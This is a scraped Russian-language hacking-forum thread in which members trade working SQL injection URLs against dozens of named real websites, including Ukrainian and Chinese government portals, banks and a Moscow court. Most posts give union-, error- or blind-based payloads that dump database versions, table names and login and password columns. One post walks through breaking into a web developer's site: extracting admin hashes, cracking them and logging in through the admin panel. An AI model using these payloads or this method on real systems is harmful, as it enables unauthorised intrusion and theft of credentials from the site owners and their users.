SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    4.1.18:trt@rex.hc.ru:wwwtrtru

    тиц 350
    выводим в ошибке!
    Version: 4.1.25-log:
    DB: ilingra6_site
    user: ilingra6_bd@localhost
    OS: portbld-freebsd6.3
     
    _________________________
    #11341 Strilo4ka, 18 Jan 2010
    Last edited: 18 Jan 2010
    1 person likes this.
  2. Amoura

    Amoura Elder - Старейшина

    Joined:
    23 Jan 2008
    Messages:
    244
    Likes Received:
    148
    Reputations:
    46
    Code:
    http://flyingweb.dreamhosters.com/note_news.php?rid=-10+union+select+1,2,3,4,group_concat(concat_Ws(0x3a,loginName,password)),6,7,8,9,10,11,12,13,14,15,16+from+flyingweb.flyingweb_admin_user---

    5.0.67-userstats-log
    flyingweb
    zyf2008@bowser.dreamhost.com
     
    #11342 Amoura, 18 Jan 2010
    Last edited: 18 Jan 2010
  3. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    polevivan@localhost:5.0.84-log:libserv:pc-linux-gnu

     
    _________________________
  4. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    68
    Likes Received:
    90
    Reputations:
    52
    Коммунистическая партия Китая. Организация департамента Dashiqiao
    http://www.dsqzzb.gov.cn/kxfz/news.php?sid=-23+union+select+1,version()--+

    У кого там зуб на Украину? :p.. у меня нет.. ) Там щас выборы в Украине..Потому.. :)

    Официйний сайт Державного департамента з усиновлення та захисту прав дитини Міністерства України у справах сім'ї, молоді та спорту
    http://www.ditu.gov.ua/en/decrees/-2177+union+select+1,2,3,4,5,concat_ws%280x3a,user%28%29,version%28%29,database%28%29%29,7,8,9,10,11,12,13,14,15,16+from+mysql.user--+
    user() - root@localhost
    version() - 5.0.51b-community-nt-log
    database() - depdeti
    file_priv = Y
    /phpmyadmin/ присутствует
    /admin/ тоже

    Чернігівська облдержадміністрація
    http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+from+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu
    http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,usesuper||chr%2858%29||passwd+from+pg_user+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu
    http://cg.gov.ua/single_page.php?menu_id=-5+union+select+1,user||chr%2858%29||passwd+from+com.users+LIMIT+1+OFFSET+0--+&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu
    http://cg.gov.ua/static_list.php?menu_id=1&NameTable=static_list&TypeCod=&DEPAT=29+and+1=cast%28%28SELECT+current_user||chr%2858%29||current_database%28%29||chr%2858%29||version%28%29%29+as+int%29--&pm=blue_menu
    http://sosadm.cg.gov.ua/single_page.php?menu_id=-5+and+1=cast%28%28SELECT+current_user||chr%2858%29||current_database%28%29||chr%2858%29||version%28%29%29+as+int%29--&NameTable=static_page&TypeCod=&DEPAT=27&pm=green_menu
    user - www
    database - portal
    version - PostgreSQL 8.3.5 on i686-pc-linux-gnu, compiled by GCC gcc (GCC) 4.2.4
    Как я понял, все поддомены там под одним юзвером и двигом. Получается добавим список уязвимых (под)сайтов.
    bobradm.cg.gov.ua
    borzadm.cg.gov.ua
    chernrda.cg.gov.ua
    goradm.cg.gov.ua
    ichadm.cg.gov.ua
    koradm.cg.gov.ua
    kpadm.cg.gov.ua
    kuladm.cg.gov.ua
    meadm.cg.gov.ua
    neadm.cg.gov.ua
    nosadm.cg.gov.ua
    novgadm.cg.gov.ua
    oda.cg.gov.ua
    pladm.cg.gov.ua
    rpadm.cg.gov.ua
    schorsadm.cg.gov.ua
    semadm.cg.gov.ua
    sribadm.cg.gov.ua
    taladm.cg.gov.ua
    varadm.cg.gov.ua
    не кисло :)


    Система розкриття інформації на фондовому ринку України. Агентство по развитию инфраструктуры фондового рынка Украины
    http://www.smida.gov.ua/emitents/zvit_menu.php?id=4746+and+substring(version(),1,1)=4&forma=PERSON_Z&zvit_type=zat414&kod=32979387
    http://old.smida.gov.ua/news/sv_1.php?id_news=-8077+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14
    Disallow: /adminzone/
    phpinfo.php на месте ;)
    user() - dbu@localhost
    version() - 4.1.20-log
    database() - smida


    ВИЩА КВАЛІФІКАЦІЙНА КОМІСІЯ АДВОКАТУРИ при Кабінеті Міністрів України
    http://www.vkka.gov.ua/index.php?page=katalog&id=-41+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17--+
    version() - 5.1.30-log
    user() - vkka_root@localhost
    database() - vkka_adv
    все выводиться на ура ;)
    админка присутствует.
     
    #11344 v1d0qz, 19 Jan 2010
    Last edited: 19 Jan 2010
    4 people like this.
  5. Ctacok

    Ctacok Banned

    Joined:
    19 Dec 2008
    Messages:
    754
    Likes Received:
    649
    Reputations:
    251
    htf@localhost:htf:5.0.77-log
     
  6. v1d0qz

    v1d0qz Elder - Старейшина

    Joined:
    21 Jul 2007
    Messages:
    68
    Likes Received:
    90
    Reputations:
    52
    Если кому интересно, большинство сайтов тицастые и пиаристые.

    ---1---
    http://mgta.ru/raspisania/rasp'+or(1,1)=(select+count(*),concat(concat(1,0x3a,(select+concat(user,0x3a,password,0x3a,file_priv)+from+mysql.user+LIMIT+0,1)),floor(rand(0)*2))from+mysql.user+group+by+2)--+/
    version() - 5.0.841
    user() - meli@localhost1
    database() - wwwmeliru_sb1
    Права на запись есть.

    ---3-blind---
    http://nova-budova.com.ua/?n=press_center&type=shares'+and+substring(version(),1,1)='5
    5-я версия

    //=============================================== start usoft
    Уязвимости от компании Ю-софт. Разрабатывают сайты 16 лет.
    Особенность: 1. На некоторых уязвимых сайтах нельзя подставить 'пробел' '*'. Вывод ошибки работает в опере, в мозиле не работает. Все сайты которые я просмотрел, я вылаживаю.
    Возможные варианты вывода.
    ---4-банк---
    http://web.altabank.ru/cervice/chapter_1/mbotvetstv'or(1,1)=(select*from(select(name_const((select(table_name)from(information_schema.tables)where(table_name)LIKE('CHARACTER_SETS')),1)),name_const((select(table_name)from(information_schema.tables)where(table_name)LIKE('CHARACTER_SETS')),1))a)='5/
    http://web.altabank.ru/cervice/chapter_1/mbotvetstv'or(1,1)=(select*from(select+name_const(version(),1),name_const(version(),1))a)='5

    Остальные сайты..
    ---6-Blind. Ещё один сайт юсофта---
    Тут пробелы не фильтруются, но и вывода в дублях нету. поэтому получается blind inj
    http://u-torg.ru/news/?act=show_news&id=2489+and+substring(version(),1,1)=5#
    ---7-Компания---
    http://www.interstroy-v.ru/objects/ob30'or(1,1)=(select*from(select+name_const(version(),1),name_const(version(),1))a)='5
    ---8-компания---
    http://www.priorityins.ru/fiz'or(1,1)=(select*from(select+name_const(version(),1),name_const(version(),1))a)='5
    ---9-Банк солидарность---
    http://www.solidar.ru/news'or(1,1)=(select(0)from(select+name_const(version(),1),name_const(version(),1))a)='5/new_kart/
    ---10-blind. Какой сайт, понятно по названию---
    http://mos-gorsud.ru/news/?id=235+and+lower(ascii(substring(user(),1,1)))=114
    root@....

    Ну и в заключение...
    ---11-Usoft---
    Ну собственно как же оставить без внимания сам сайт Ю-софта.. :)
    Для начала найдём какуе-то инъекцию у них на сайте. А именно...
    http://www.usoft.ru/vopros/legalnews'or(1,1)=(select*from(select+name_const(version(),1),name_const(version(),1))a)='5/
    Всё ок, но как же нам упростить задачу по перебору? Давайте посмотрим что там ещё висит у них.. Находим такой поддомен.
    http://pilot.usoft.ru
    Составим запрос для подбора таблички.
    http://pilot.usoft.ru/?tid=4+or(1,1)=(select+count(0),concat((select+table_name+from+information_schema.tables+limit+17,1),floor(rand(0)*2))from(information_schema.tables)+group+by+1)+--+
    Теперь для быстрого подбора колонки. Я сделаю это так.
    http://pilot.usoft.ru/?tid=4+or(1)=(select+*+from(select+*+from+auth_user+as+a+auth_user+as+b+USING(id))c)--+
    Далее собственно подставляем в USING то что вылазит в эроре.
    Ну а потом, достаем логины и пароли. Пароли там в md5, но первый же юзер как ни странно админский с хешем который мгновенно расшифровуется через crackfor.me
    Ну и в конце логинимся через /admin/, никакх защит по ip как ни странно там нету.
    Внимание! В примере номер 11 стоит моя личная защита "антидурак" :)
    //================================================ end usoft

    ---12-сайт не ломать ;)---
    http://www.blagodel.ru/action/2006_blago_1/photos' and 1=(select * from(select * from information_schema.tables a JOIN information_schema.tables b)c)='1
    http://www.blagodel.ru/action/2006_blago_1/photos' and 1=(select * from(select * from (select * from information_schema.tables a)b JOIN (select * from information_schema.tables d)c USING(TABLE_CATALOG))g)='1
    запятые косят запрос. Получилось вывести только так. Если кто выведет проще, буду рад посмотреть.

    ---13---
    http://www.vstoneft.ru/analit.php?number=141+union+select+1,2,3,4,5,6,version(),8,9--

    ---14---
    http://www.mebel-aliance.ru/tables.php?id=63'+union+select+1,2,3,4,concat(table_schema,0x3a,table_name,0x3a,column_name),6,7,8,9,10,11,12,13,14+from+information_schema.columns--+
    без ограничения

    ---15---
    http://www.platforma.ru/search/?search=%'+and+(1,1)=(select+count(*),concat(version(),floor(rand(0)*2))from+essentials+group+by+2)+--+
    version() - 4.1.21
    user() - platforma@www.plus.ru
    database() - platforma

    //================================================ start News Edit
    Движок News Edit от Newsedit.ru

    Снова ошибка в переменной которая обратабывается через .htaccess, такое чувство разработчики думают, что htaccess что-то фильтрует.
    ---16---
    http://www.wn.ru/video/01.12.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html
    ---17---
    http://www.cdrinfo.ru/news/28.10.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html
    ---18---
    http://www.parovozik.ru/news/11.11.2009/2+union+select+1,version(),3,4,5,6,7,8,9,10--.html
    ---19-1500 тица ;)---
    тут пароля в открытом виде ;)
    http://pro-n.ru/news/12.01.2010/2+union+select+1,version%28%29,3,4,5,6,7,8,9,10+from+users--.html
    //================================================ end News Edit

    ---20---
    ууу, какой страшный сайт.. :p
    http://www.stalin.su/book.php?bid=1+or(1,1)=(select+count(0),concat((select+table_name+from+information_schema.tables+limit+26,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)+--+
    http://www.stalin.su/book.php?bid=1+or(1,1)=(select*from(select*from+st_xuser+as+a+join+st_xuser+as+b+USING(id))c)+--+
    http://www.stalin.su/book.php?bid=1+or(1,1)=(select+count(0),concat((select+concat_ws(0x3a,access,login,password)+from+st_xuser+LIMIT+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)+--+

    ---21---
    http://www.inform-soccer.com/TOTO/tstscores.php3?TURNIR=409&ID=-158682+union+select+1,2,3,version(),5,6--
    version() - 4.1.25-log
    user() - soccer@localhost
    database() - inform_soccer_com

    ---22-Blind---
    http://www.skoma.ru/catbuilder.php?id=24+and+substring(version(),1,1)=4

    ---23---
    http://www.stroimarket.info/goods.php?viewprod=2&id=5&pid=10'+or(1,1)=(select+*+from(select+name_const((select+table_name+from+information_schema.tables+WHERE+table_name+LIKE+'%user%'+LIMIT+0,1),1),name_const((select+table_name+from+information_schema.tables+WHERE+table_name+LIKE+'%user%'+LIMIT+0,1),1))a)/*

    ---24---
    вывод смотрите в html, он вообщем в хрефе.
    http://mirrortuning.ru//oneadmin/
    http://mirrortuning.ru/photos.php?category_id=&parent_id=-0+UNION+SELECT+version(),2&photo_id=18&start=123
    Database Version: 5.0.67-userstats-log
    Database name: mt
    User name: ender@tampico.dreamhost.com

    ---25-Blind---
    http://www.gestia.com.ua/fs/wywod_stati/?showiblo=332'+and+substring(version(),1,1)=4/*

    ---26---
    Вывод после редиректа в адресной строке.
    http://test-d.cncinfo.ru/index.php?id=-213+union+select+1,2,3,4,5,6,7,concat(version(),database(),user()),9,10
    http://test-d.cncinfo.ru/index.php?id=-213+union+select+1,2,3,4,5,6,7,concat(table_schema,0x3a,table_name),9,10+from+information_schema.tables+where+table_name+LIKE+'%user%'+LIMIT+0,1

    ---28---
    Без ограничений.
    http://www.infra-audit.ru/doc.php?doc_id=4+union+select+1,concat_ws(0x3a,table_schema,table_name,column_name),3,4,5,6,7+from+information_schema.columns

    ---29---
    Без ограничений.
    http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND%20_goods.is_publish=%271%27%20AND%20_subcats.is_publish=%271%27%20AND%20_cats.is_publish=%27%27%20AND%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods.idc%20union+select+1,2,3,4,5,concat_ws%280x3a,table_schema,table_name,column_name%29,7,8,9+from+information_schema.columns+where+table_name=%27_users%27+--+
    http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND%20_goods.is_publish=%271%27%20AND%20_subcats.is_publish=%271%27%20AND%20_cats.is_publish=%27%27%20AND%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods.idc%20union+select+1,2,3,4,5,concat_ws%280x3a,login,assword,mail%29,7,8,9+from+_users+LIMIT+200+--+
    http://www.buketbutik.ru/search/adv/?form=1%27%29%29%20AND%20_goods.osn=%271%27%20AND%20_goods.is_publish=%271%27%20AND%20_subcats.is_publish=%271%27%20AND%20_cats.is_publish=%27%27%20AND%20_subcats.id=_goods.ids%20AND%20_cats.id=_goods.idc%20union+select+1,2,3,4,5,concat_ws%280x3a,admin_firstname,admin_lastname,admin_password,admin_email_address,admin_right_access%29,7,8,9+from+admin+LIMIT+200+--+

    ---30---
    http://www.iie.tpu.ru/ru/seenews.php?IDNews=159+and+substring(version(),1,1)=3
    3-я версия.

    ---31---
    http://bellenmetip.net/actueel/nieuws/329/nassau-academy-unieke-samenwerking-onderwijs-en-bedrijfsleven'+or(1,1)=(select*from(select+name_const(version(),1),name_const(version(),1))b)+--+/

    ---32-blind---
    http://www.arbonica.ru/marketing'+or+substring(version(),1,1)=5--+/
    перебирать можно так..
    http://www.arbonica.ru/marketing'+and+lower(ascii(substring(user(),1,1)))=114
    юзвер != рут :(

    ---33---
    Sweb блочит 'from', через post - сценарий не работает. Потому можно получить только user(), version() etc...
    http://www.beauty-fitness.ru/users/?id=-1324'+union+select+1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+

    ---34---
    http://www.my-antiage.ru/index.php?id=49+union+select+1,2,3,4,5,version(),7,8,9--
    version() - 4.1.25-log
    user() - lipopla8_sdr@localhost
    database() - lipopla8_acc

    ---35---
    http://cdd.aac.ru/index.php?id=20'and(substring(version(),1,1))=4--+

    ---36---
    http://www.chuvrdub.ru/base/base.html?mode=aut&id=-47+UNION+SELECT+1,2,version(),4--
    version() - 5.0.84-percona-highperf-b18-log
    user() - anhelga_user1@91.195.124.9
    database() - anhelga_authors

    ---37---
    http://www.hedef-makina.com/ru/index.php?p=sayfa&item=duyuru&id=-27+union+select+1,2,3,database(),5,6,7,user(),9,10,11--
    5.0.45-community-nt
    hedef-makina
    hedef@localhost

    ---41---
    Без ограничений
    http://www.sotovyi.ru/index.php?cid=11&pid=63/**/union/**/select/**/concat(table_schema,0x3a,table_name,0x3a,column_name),2,3,4,5,6/**/from/**/information_schema.columns--

    ---42---
    http://parkhotelgardenia.com/conference_hall.php?pos=6+union+select+1,2,concat_ws(0x3a,user(),version(),database()),4
    version() - 5.0.85-community-log
    user() - prkhote_slava@localhost
    database() - prkhote_gardenia
    Забыл какая тут табличка, а переберать в 5 утра лень) Но помню что там колонки id:username:password:idrights:realname
    И пароль там подходит от мыльника админа

    --------------------------------------------

    Есть конечно ещё вкусное, но не всё сразу..
    Чем больше критики, тем лучше, желательно пм.
    Спасибо за внимание.
     
    #11346 v1d0qz, 20 Jan 2010
    Last edited: 23 Jan 2010
    10 people like this.
  7. Strilo4ka

    Strilo4ka

    Joined:
    5 Apr 2009
    Messages:
    712
    Likes Received:
    727
    Reputations:
    948
    PR 5
    ТИЦ 700


    5.0.77-log:website:admin@www.isp.nsc.ru:portbld-freebsd7.0

    BD:
    Code:
    information_schema:anketa:asut:dbmail:dspam:fotonika2009:glpi:invitation:ipacct:jabberd2:joomla:lib_mba:library:mysql:ng_stat:norma:ocsweb:olka:site:symposium:system_ball:test:test_lib:thesis:website:ysc:ysc_copy

    Code:
    body:body_eng:news:structure:structure_admin:structure_eng:users
    с результата запроса и ежу понятно что не одна таблица users (есть в других БД) когда узанем атрибуты таблы users вот они ^_^
    Code:
    id:login:pass:ip:last_keepalive:type:enabled:day_quota:month_quota:fullname:desc:admin_level:id:name:passwd:sotrid:chek:id:surname:fname:secname:email:name_doclad:type_doclad:check_send:check_confirm:auth_doclad:id:name:passwd:sotrid:chek:id:user_login:user_password:user_type

    логин и пасс
    В гугле несколько каталогов с которыми работают БД перечислены выше ,и у всех пр 5 когда посмотреть!
    через этот сайт можно доставать инфу .
    магические включены, есть webmail и еще много вкусностей, алгоритмы шифрования пассов md5 и mysql , кстати читалка в скуле работает , забыл сказать и хешкрекинг.инфо не выдал пасс md5 , но зато есть темка на античате <on-line сервисы розшифровки> то там нашел ;-)
    в гугле для поиска других :)
    Ех,класно что опять античат то заработал :)
     
    _________________________
    #11347 Strilo4ka, 20 Jan 2010
    Last edited: 20 Jan 2010
    5 people like this.
  8. Krist_ALL

    Krist_ALL Banned

    Joined:
    14 Jan 2009
    Messages:
    457
    Likes Received:
    193
    Reputations:
    24
    http://cards.km.ru/cardslist.asp?id_real={78EFE1E1-0D03-4515-8CC9-3ADC2F09D300}' and 1=@@version--'
     
    2 people like this.
  9. nemaniak

    nemaniak Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    241
    Likes Received:
    161
    Reputations:
    108
    giscripts.in

    Code:
    http://www.giscripts.in/b2b/selloffers.php?cid=-14+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8--
    Code:
    5.0.81-community:yellowpa_glrd@localhost:yellowpa_b2b
    secureb2b.com

    Code:
    http://www.emerix.com/selloffers.php?cid=-1+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5,6,7,8--
    Code:
    5.0.51a-24+lenny2-log:ks8136@localhost:ks8136db1
     
    2 people like this.
  10. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,503
    Likes Received:
    398
    Reputations:
    228
    Code:
    http://www.vertavo.com/repspecs.php3?counter=-254+union+select+1,2,3,4,5,6,7,8+from+admin+--+
    Code:
    http://www.multistore.ch/index.php?catid=864+union+select+1,2,unhex(hex(user())),4,5,6+/*+&subcatid=224http://www.donpaco.ch/events_det.php?galerie_id=-278+union+select+1,2,3,4,5,6,7,8,9,10+--+
    Code:
    http://www.impuls-nn.ru/shop/more/?iid=-100012860+union+select+1,2,3,4,5,concat_ws(0x3a3a,cid,clogin,cpass,corg,ctype),7,8,9,10,11,12,13,14,15,16,17,18,19,20+from+impulse_users+where+ctype=0+--+
    Code:
    http://www.beautifulpalestine.com/largpic.php?id=-312+union+select+1,2,3,concat_ws(0x3a3a,username,password),5,6,7+from+members+--+&lid=13
    Code:
    http://apla-pal.org/show_news_details.php?id=-85+union+select+1,column_name,3,4,5,6,7,8+from+information_schema.columns+where+table_name=0x7573657273+--+
    Code:
    http://nhn.meerbusiness.nl/partners/partners_showitems.asp?type=sponsor'+uNIon+seLEct+1,2,3,4,5+--+&content_id=6
    Code:
    http://femgmbh.com/photogallery.php?action=liste&rubrikid=63+union+select+database(),2+/*+
    Code:
    http://www.singaporechefs.com/publicsite/newsdetail.php?id=-48'+union+select+1,2,3,4,concat_ws(0x3a3a,username,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+user+--+
    Code:
    http://www.asiacuisine.com.sg/eventcalendar.php?eventdate=-2010-1-24'+union+select+1,concat_ws(0x3a3a,user_id,username,password,enpassword,ip,lastlogin,lastlogout,privilege),3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+cwa_user+--+
    Code:
    http://www.gourmetabudhabi.ae/ad2010/english/representative.php?id=-60+union+select+1,2,3,4,5,6,7,8,9,10,password,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44+from+user+--+
    Code:
    http://www.wacs2000.org/wacs2009_beta/en/culinary_programs/competition.php?id=-18+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,unhex(hex(group_concat(TabLe_NamE))),27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+group+by+table_schema+limit+2,1+--+
    Code:
    http://www.fischergold.de/index.php?id=-51+union+select+1+--+
    
    Code:
    http://www.alice-miller.com/readersmail_en.php?lang=en&nid=-2927+union+select+1,2,3,4+--+&grp=0110
    Code:
    http://www.presidence.bf/listArticles.php?sid=-10+union+select+1,2,concat_ws(0x3a3a,username,password),4+from+pbf_users+--+&page=1&articlesPerPage=5
    Code:
    http://southindianpost.com/gallery/index.php?page=1&category=1.1&photoId=-2+union+select+1,2,3,4,5,6,7,8,9,10+--+
    Code:
    http://satorisalon.ru/satlist.php?idp=-145'+union+select+1,2,3,4,5,6,7,8,9+--+
    Code:
    http://www.ivanenko.name/showpart.php?idp=-3'+union+select+1,2,3,4,5,6,7,8,9+from+information_schema.tables+--+
    Code:
    http://www.matuls.pl/index.php?IDP=1&Lng=1&IDKategoria=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a3a,UserPass,UserName,UserEmail),9+from+CMSUsers+limit+0,1+--+
    Code:
    http://www.panterafilms.ru/portf/work.php?idp=-65+union+select+1,2,3,4,5,6,7,8,9,10+from+cns_config+--+
     
    3 people like this.
  11. m0use

    m0use Elder - Старейшина

    Joined:
    22 Feb 2006
    Messages:
    59
    Likes Received:
    8
    Reputations:
    0
    http://www.azez.ru/ind.php?pn=2&id_typ=-239+union+select+1,2,3,4,5,6,version(),8,9,10,11,12,13,14,15,1 6,17,18,19,20,21,22,23,24,25,26,27,28--
    sql 5
    pr 5
    тиц 10
     
    1 person likes this.
  12. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,191
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://yugo-vostok.org/?sec=artical&id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8/*
    Code:
    ugo@localhost@localhost:ugo:5.0.32-Debian_7etch11-log
     
    1 person likes this.
  13. erolom

    erolom New Member

    Joined:
    14 Mar 2009
    Messages:
    45
    Likes Received:
    4
    Reputations:
    1
    Code:
    [+]Printable field: 2
    [+]Vuln URL: http://www.tiboschtrading.nl/details.php?id=-54+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
    Code:
    [+]Printable field: 5,6
    [+]Vuln URL: http://www.pascal-tie.com/production/details.php?id=-44+UNION+SELECT+1,2,3,4,5,6,7,8,9--
    [+]MySQL Info: murakami@localhost:4.1.20:tie_com:binjredhat-linux-gnu
    Code:
    [+]Printable field: 2,4
    [+]Vuln URL: http://www.infinspb.ru/index.php?id=-217+UNION+SELECT+1,2,3,4,5,6--
    [+]MySQL Info: mega470_mysql@10.1.90.228:4.1.22-log:mega470_infin:binjportbld-freebsd6.2
     
  14. GinTonic

    GinTonic New Member

    Joined:
    18 Dec 2009
    Messages:
    13
    Likes Received:
    3
    Reputations:
    1
    5.0.44-log:u_edifierU@localhost:edifierU
     
  15. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    482
    Likes Received:
    190
    Reputations:
    221
    Code:
    http://www.lv/list.php?id=-1+UNION+SELECT+1,2--
    Code:
    http://www.babynamefacts.com/namelists/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11--
    Code:
    http://dl.game.21cn.com/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22--
    Code:
    http://atsta.net/list.php?id=-1+UNION+SELECT+1,2,3,4--
    Code:
    http://www.ewpa-majster.pl/list.php?id=-1+UNION+SELECT+1,2,3,4--
    Code:
    http://robassales.co.za/product-list.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
    Code:
    http://www.99dq.com/hyqqbxdclw/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
    Code:
    http://www.hipickbuy.com/list.php?id=-1+UNION+SELECT+1--
    Code:
    http://www.castlight.com.au/list.php?id=-1+UNION+SELECT+1--
    Code:
    http://www.palmasta.com/list.php?clang=-1+UNION+SELECT+1--
    Code:
    http://www.megamarkets.com.au/shopping/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16--
    Code:
    http://www.bulgarianpropertysale.co.uk/list.php?region_id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25%E2%80%8B,26,27--
    Code:
    http://www.ecoogimall.com/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
    Code:
    http://www1.hfut.edu.cn/organ/wsbgs/ch/list.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
    Code:
    http://www.belldavispitt.com/practice.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
    Code:
    http://mmc.awesomemath.org/practice.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--
    Code:
    http://mckitchens.com/panorama-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6--
    Code:
    http://www.nashashmi.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4--
    Code:
    http://www.lvnoon.co.uk/image-viewer.php?Id=-1+UNION+SELECT+1,2,3--
    Code:
    http://central.nightglass.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9--
    Code:
    http://sturgisrallydaily.com/sturgis_rally_news/history/viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
    Code:
    http://www.jakeabramson.com/Viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
    Code:
    http://www.postautobody.com/restoration/viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7--
    Code:
    http://www.weir-tscs.com/articles-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10--
    Code:
    http://www.darkcrystalis.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4--
    Code:
    http://www.pegplay.com/viewer.php?id=-1+UNION+SELECT+1,2,3,4--
    Code:
    http://scientificcomtech.com/news-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5--
    Code:
    http://www.barneybags.co.uk/page-viewer.php?id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12--
    Code:
    http://www.teaseumcams.com/viewer.php?id=-1+UNION+SELECT+1,2--
    Code:
    http://www.hardbodyvideo.com/viewer.php?id=-1+UNION+SELECT+1,2--
     
    3 people like this.
  16. spamerr

    spamerr New Member

    Joined:
    18 Jul 2008
    Messages:
    22
    Likes Received:
    0
    Reputations:
    0
    Code:
    http://www.thefalesteam.com/buy.php?ID=13+UNION+SELECT+1,2,3,4,5,6,version(),8,9,10,11,12+--+
    Version:5.0.77
    User:fales_web@localhost
    Database:fales
     
  17. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    266
    Likes Received:
    150
    Reputations:
    28
    http://www.pridepools.com/display.php?pid=-10+UNION+SELECT+1,2,3,4

    Database Version: 5.0.67.d7-ourdelta-log
    Database name: pride
    User name: pride@72.167.131.222
     
    1 person likes this.
  18. RedX

    RedX Member

    Joined:
    12 Jun 2008
    Messages:
    41
    Likes Received:
    13
    Reputations:
    4
    5.0.87-community-log
    localcom_communi@localhost
    localcom_nbsupportforums

    5.0.87-community-log clantige_communi@localhost clantige_community

    5.0.45 root@localhost sstb_forum
    5.0.87-percona-highperf ispyderz@lotus.x10hosting.com ispyderz_ispyderz

    5.0.32-Debian_7etch11-log livingtheprofs_@srv137.one.com livingtheprofs_
    5.0.45-community-nt akademi@localhost aksuakad_
     
    #11358 RedX, 27 Jan 2010
    Last edited: 27 Jan 2010
    2 people like this.
  19. Zombi ****

    Zombi **** Elder - Старейшина

    Joined:
    4 Apr 2009
    Messages:
    457
    Likes Received:
    181
    Reputations:
    17
    http://www.caentechnologies.com/nuclear/news.php?id=1+union+select+1,2,3,group_concat(table_name),5,6,7,8,9,10+from+information_schema.tables--
     
    6 people like this.
  20. oiki

    oiki New Member

    Joined:
    21 Jan 2010
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    http://www.neolitica.ru/index.php?r_id=-1+UNION+SELECT+1,2,3,4,5,6--

    http://zooclub.ru/article.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9--

    http://www.kidsmile.ru/news/detail.php?id=-1+UNION+ALL+SELECT+1,2,3,4,5,6--
     
Loading...
Thread Status:
Not open for further replies.